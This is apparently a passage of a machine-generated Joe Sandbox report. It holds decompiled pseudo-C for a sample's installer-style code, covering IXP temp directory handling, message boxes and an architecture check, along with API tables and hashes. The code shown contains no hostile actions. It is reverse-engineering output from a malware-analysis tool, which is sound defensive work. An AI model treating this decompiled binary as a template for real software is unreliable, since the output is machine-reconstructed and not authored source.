                                                                                                                                                                                                        								if(E000C681F(_t67) == 0) {
                                                                                                                                                                                                        									L25:
                                                                                                                                                                                                        									_t49 = 0x10000;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t54 = E000C67C9(_t74, _t74);
                                                                                                                                                                                                        									_t49 = 0x190000;
                                                                                                                                                                                                        									if(_t54 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                        								_t83 = _t52;
                                                                                                                                                                                                        								LocalFree(_t80);
                                                                                                                                                                                                        								_t39 = _t52;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(E000C681F(_t67) == 0) {
                                                                                                                                                                                                        							L4:
                                                                                                                                                                                                        							_t64 = 0x10010;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t66 = E000C67C9(0, 0);
                                                                                                                                                                                                        							_t64 = 0x190010;
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								goto L4;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x000c44b9
                                                                                                                                                                                                        0x000c44c4
                                                                                                                                                                                                        0x000c44cb
                                                                                                                                                                                                        0x000c44d8
                                                                                                                                                                                                        0x000c44e4
                                                                                                                                                                                                        0x000c44eb
                                                                                                                                                                                                        0x000c44ee
                                                                                                                                                                                                        0x000c44ef
                                                                                                                                                                                                        0x000c44ef
                                                                                                                                                                                                        0x000c44f1
                                                                                                                                                                                                        0x000c44f7
                                                                                                                                                                                                        0x000c44f8
                                                                                                                                                                                                        0x000c467b
                                                                                                                                                                                                        0x000c44fe
                                                                                                                                                                                                        0x000c4509
                                                                                                                                                                                                        0x000c4518
                                                                                                                                                                                                        0x000c4525
                                                                                                                                                                                                        0x000c4562
                                                                                                                                                                                                        0x000c4568
                                                                                                                                                                                                        0x000c4568
                                                                                                                                                                                                        0x000c456b
                                                                                                                                                                                                        0x000c456b
                                                                                                                                                                                                        0x000c456d
                                                                                                                                                                                                        0x000c456e
                                                                                                                                                                                                        0x000c4572
                                                                                                                                                                                                        0x000c4578
                                                                                                                                                                                                        0x000c457c
                                                                                                                                                                                                        0x000c45cb
                                                                                                                                                                                                        0x000c4607
                                                                                                                                                                                                        0x000c4607
                                                                                                                                                                                                        0x000c460d
                                                                                                                                                                                                        0x000c4613
                                                                                                                                                                                                        0x000c4617
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c461d
                                                                                                                                                                                                        0x000c4623
                                                                                                                                                                                                        0x000c4626
                                                                                                                                                                                                        0x000c4628
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4628
                                                                                                                                                                                                        0x000c45cd
                                                                                                                                                                                                        0x000c45cd
                                                                                                                                                                                                        0x000c45cf
                                                                                                                                                                                                        0x000c45cf
                                                                                                                                                                                                        0x000c45d2
                                                                                                                                                                                                        0x000c45d2
                                                                                                                                                                                                        0x000c45d4
                                                                                                                                                                                                        0x000c45d5
                                                                                                                                                                                                        0x000c45db
                                                                                                                                                                                                        0x000c45de
                                                                                                                                                                                                        0x000c45e3
                                                                                                                                                                                                        0x000c45e9
                                                                                                                                                                                                        0x000c45ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c45f3
                                                                                                                                                                                                        0x000c45fd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4602
                                                                                                                                                                                                        0x000c45ed
                                                                                                                                                                                                        0x000c457e
                                                                                                                                                                                                        0x000c457e
                                                                                                                                                                                                        0x000c4580
                                                                                                                                                                                                        0x000c4580
                                                                                                                                                                                                        0x000c4583
                                                                                                                                                                                                        0x000c4583
                                                                                                                                                                                                        0x000c4585
                                                                                                                                                                                                        0x000c4586
                                                                                                                                                                                                        0x000c458a
                                                                                                                                                                                                        0x000c458c
                                                                                                                                                                                                        0x000c458f
                                                                                                                                                                                                        0x000c458f
                                                                                                                                                                                                        0x000c4591
                                                                                                                                                                                                        0x000c4592
                                                                                                                                                                                                        0x000c459b
                                                                                                                                                                                                        0x000c459e
                                                                                                                                                                                                        0x000c45a3
                                                                                                                                                                                                        0x000c45a9
                                                                                                                                                                                                        0x000c45ad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c45af
                                                                                                                                                                                                        0x000c45af
                                                                                                                                                                                                        0x000c45bf
                                                                                                                                                                                                        0x000c462d
                                                                                                                                                                                                        0x000c4630
                                                                                                                                                                                                        0x000c463d
                                                                                                                                                                                                        0x000c464e
                                                                                                                                                                                                        0x000c464e
                                                                                                                                                                                                        0x000c463f
                                                                                                                                                                                                        0x000c4640
                                                                                                                                                                                                        0x000c4647
                                                                                                                                                                                                        0x000c464c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c464c
                                                                                                                                                                                                        0x000c4666
                                                                                                                                                                                                        0x000c466d
                                                                                                                                                                                                        0x000c466f
                                                                                                                                                                                                        0x000c4675
                                                                                                                                                                                                        0x000c4675
                                                                                                                                                                                                        0x000c45ad
                                                                                                                                                                                                        0x000c4527
                                                                                                                                                                                                        0x000c452e
                                                                                                                                                                                                        0x000c453f
                                                                                                                                                                                                        0x000c453f
                                                                                                                                                                                                        0x000c4530
                                                                                                                                                                                                        0x000c4531
                                                                                                                                                                                                        0x000c4538
                                                                                                                                                                                                        0x000c453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c453d
                                                                                                                                                                                                        0x000c4554
                                                                                                                                                                                                        0x000c455a
                                                                                                                                                                                                        0x000c455a
                                                                                                                                                                                                        0x000c455a
                                                                                                                                                                                                        0x000c4525
                                                                                                                                                                                                        0x000c468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 000C45A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 000C45E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 000C460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 000C4630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 000C4666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 000C466F
                                                                                                                                                                                                          • Part of subcall function 000C681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 000C686E
                                                                                                                                                                                                          • Part of subcall function 000C681F: GetSystemMetrics.USER32(0000004A), ref: 000C68A7
                                                                                                                                                                                                          • Part of subcall function 000C681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000C68CC
                                                                                                                                                                                                          • Part of subcall function 000C681F: RegQueryValueExA.ADVAPI32(?,000C1140,00000000,?,?,0000000C), ref: 000C68F4
                                                                                                                                                                                                          • Part of subcall function 000C681F: RegCloseKey.ADVAPI32(?), ref: 000C6902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                        • API String ID: 3244514340-2605220145
                                                                                                                                                                                                        • Opcode ID: ccafe1b2623e4a950254a9348c6dc2e0a6398f3320cc6a4b55c4343b891d9d9b
                                                                                                                                                                                                        • Instruction ID: a43a112a4f3ff237ebc816ff43edc215e5d5b9f6eaad62d38ac90870b0235b4f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccafe1b2623e4a950254a9348c6dc2e0a6398f3320cc6a4b55c4343b891d9d9b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7051D372A00219ABDB219F28CC58FEE7BA9FF46304F144198FD09A7246DB36DE05CB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E000C53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				long _t13;
                                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                                        				CHAR* _t20;
                                                                                                                                                                                                        				int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				CHAR* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                        				_t32 = __edx;
                                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                                        				_t29 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E000C171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                        					_t34 = _t34 + 0x10;
                                                                                                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                                                                                                        					E000C1680(_t32, 0x104, _t20);
                                                                                                                                                                                                        					E000C658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                        					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                        					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t29 < 0x190) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t30 = 0;
                                                                                                                                                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                        						_t30 = 1;
                                                                                                                                                                                                        						DeleteFileA(_t32);
                                                                                                                                                                                                        						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return E000C6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t30 = 1;
                                                                                                                                                                                                        				 *0xc8a20 = 1;
                                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x000c53ac
                                                                                                                                                                                                        0x000c53b3
                                                                                                                                                                                                        0x000c53b9
                                                                                                                                                                                                        0x000c53bb
                                                                                                                                                                                                        0x000c53bd
                                                                                                                                                                                                        0x000c53bf
                                                                                                                                                                                                        0x000c53d1
                                                                                                                                                                                                        0x000c53d6
                                                                                                                                                                                                        0x000c53e0
                                                                                                                                                                                                        0x000c53e2
                                                                                                                                                                                                        0x000c53f5
                                                                                                                                                                                                        0x000c53fb
                                                                                                                                                                                                        0x000c5402
                                                                                                                                                                                                        0x000c540b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5413
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5415
                                                                                                                                                                                                        0x000c5416
                                                                                                                                                                                                        0x000c5427
                                                                                                                                                                                                        0x000c542a
                                                                                                                                                                                                        0x000c542b
                                                                                                                                                                                                        0x000c5434
                                                                                                                                                                                                        0x000c5434
                                                                                                                                                                                                        0x000c543a
                                                                                                                                                                                                        0x000c544c
                                                                                                                                                                                                        0x000c544c
                                                                                                                                                                                                        0x000c5452
                                                                                                                                                                                                        0x000c545a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c545e
                                                                                                                                                                                                        0x000c545f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C171E: _vsnprintf.MSVCRT ref: 000C1750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C53FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-957705000
                                                                                                                                                                                                        • Opcode ID: 27509d9ebe047b4ff70032f9b79e1e694af34946b492e0a7dd9b0c20d689e3d8
                                                                                                                                                                                                        • Instruction ID: 542032b2ea5e8600df0b507f700d66b48f1bba00450fad56992732a343c8a768
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27509d9ebe047b4ff70032f9b79e1e694af34946b492e0a7dd9b0c20d689e3d8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE11047130060867E3249B269C49FEF366DEBC631AF10012DF646D2191CE78998286A6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 522 c5467-c5484 523 c551c-c5528 call c1680 522->523 524 c548a-c5490 call c53a1 522->524 528 c552d-c5539 call c58c8 523->528 527 c5495-c5497 524->527 529 c549d-c54c0 call c1781 527->529 530 c5581-c5583 527->530 537 c554d-c5552 528->537 538 c553b-c5545 CreateDirectoryA 528->538 543 c550c-c551a call c658a 529->543 544 c54c2-c54d8 GetSystemInfo 529->544 533 c558d-c559d call c6ce0 530->533 541 c5554-c5557 call c597d 537->541 542 c5585-c558b 537->542 539 c5577-c557c call c6285 538->539 540 c5547 538->540 539->530 540->537 551 c555c-c555e 541->551 542->533 543->528 549 c54fe 544->549 550 c54da-c54dd 544->550 552 c5503-c5507 call c658a 549->552 555 c54df-c54e2 550->555 556 c54f7-c54fc 550->556 551->542 559 c5560-c5566 551->559 552->543 557 c54e4-c54e7 555->557 558 c54f0-c54f5 555->558 556->552 557->543 561 c54e9-c54ee 557->561 558->552 559->530 562 c5568-c5575 RemoveDirectoryA 559->562 561->552 562->530
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E000C5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t10 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				if(__edx == 0) {
                                                                                                                                                                                                        					_t48 = 0xc91e4;
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E000C1680(0xc91e4, 0x104);
                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                        					_t13 = E000C58C8(_t48); // executed
                                                                                                                                                                                                        					if(_t13 != 0) {
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						_t42 = _a4;
                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							 *0xc9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        							L24:
                                                                                                                                                                                                        							return E000C6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t16 = E000C597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t61 =  *0xc8a20; // 0x0
                                                                                                                                                                                                        						if(_t61 != 0) {
                                                                                                                                                                                                        							 *0xc8a20 = 0;
                                                                                                                                                                                                        							RemoveDirectoryA(_t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                        						_t14 = 0;
                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                        						 *0xc9124 = E000C6285();
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xc8a20 = 1;
                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 =  &_v268;
                                                                                                                                                                                                        				_t20 = E000C53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t48 = 0xc91e4;
                                                                                                                                                                                                        				E000C1781(0xc91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                        				if(( *0xc9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E000C658A(_t48, 0x104, 0xc1140);
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				GetSystemInfo( &_v304);
                                                                                                                                                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					_push("i386");
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					E000C658A(_t48, 0x104);
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = _t26 - 1;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					_push("mips");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = _t28 - 1;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					_push("alpha");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t29 != 1) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push("ppc");
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        0x000c5472
                                                                                                                                                                                                        0x000c5479
                                                                                                                                                                                                        0x000c5481
                                                                                                                                                                                                        0x000c5484
                                                                                                                                                                                                        0x000c551c
                                                                                                                                                                                                        0x000c5521
                                                                                                                                                                                                        0x000c5528
                                                                                                                                                                                                        0x000c552d
                                                                                                                                                                                                        0x000c552f
                                                                                                                                                                                                        0x000c5539
                                                                                                                                                                                                        0x000c554d
                                                                                                                                                                                                        0x000c554d
                                                                                                                                                                                                        0x000c5552
                                                                                                                                                                                                        0x000c5585
                                                                                                                                                                                                        0x000c5585
                                                                                                                                                                                                        0x000c558b
                                                                                                                                                                                                        0x000c558d
                                                                                                                                                                                                        0x000c559d
                                                                                                                                                                                                        0x000c559d
                                                                                                                                                                                                        0x000c5557
                                                                                                                                                                                                        0x000c555e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5560
                                                                                                                                                                                                        0x000c5566
                                                                                                                                                                                                        0x000c5569
                                                                                                                                                                                                        0x000c556f
                                                                                                                                                                                                        0x000c556f
                                                                                                                                                                                                        0x000c5581
                                                                                                                                                                                                        0x000c5581
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5581
                                                                                                                                                                                                        0x000c5545
                                                                                                                                                                                                        0x000c557c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c557c
                                                                                                                                                                                                        0x000c5547
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5547
                                                                                                                                                                                                        0x000c548a
                                                                                                                                                                                                        0x000c5490
                                                                                                                                                                                                        0x000c5497
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c549d
                                                                                                                                                                                                        0x000c54ab
                                                                                                                                                                                                        0x000c54b4
                                                                                                                                                                                                        0x000c54c0
                                                                                                                                                                                                        0x000c550c
                                                                                                                                                                                                        0x000c5511
                                                                                                                                                                                                        0x000c5515
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5515
                                                                                                                                                                                                        0x000c54c9
                                                                                                                                                                                                        0x000c54d6
                                                                                                                                                                                                        0x000c54d8
                                                                                                                                                                                                        0x000c54fe
                                                                                                                                                                                                        0x000c5503
                                                                                                                                                                                                        0x000c5507
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5507
                                                                                                                                                                                                        0x000c54da
                                                                                                                                                                                                        0x000c54dd
                                                                                                                                                                                                        0x000c54f7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c54f7
                                                                                                                                                                                                        0x000c54df
                                                                                                                                                                                                        0x000c54e2
                                                                                                                                                                                                        0x000c54f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c54f0
                                                                                                                                                                                                        0x000c54e7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c54e9
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C54C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C556F
                                                                                                                                                                                                          • Part of subcall function 000C53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C53FB
                                                                                                                                                                                                          • Part of subcall function 000C53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5402
                                                                                                                                                                                                          • Part of subcall function 000C53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C541F
                                                                                                                                                                                                          • Part of subcall function 000C53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C542B
                                                                                                                                                                                                          • Part of subcall function 000C53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-772166365
                                                                                                                                                                                                        • Opcode ID: a642dae81f989c827f84783b12b6d2644fef40405b32504594b6732cc220511c
                                                                                                                                                                                                        • Instruction ID: ce0c6e54a009c58127e9a14f26d14abcb8a19c06ff55725d6bbeee9b30f49dcf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a642dae81f989c827f84783b12b6d2644fef40405b32504594b6732cc220511c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50314974B00E045BEB209B659C59FBE73DAAB86346B14012EA901D21D2DB78EF818795
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
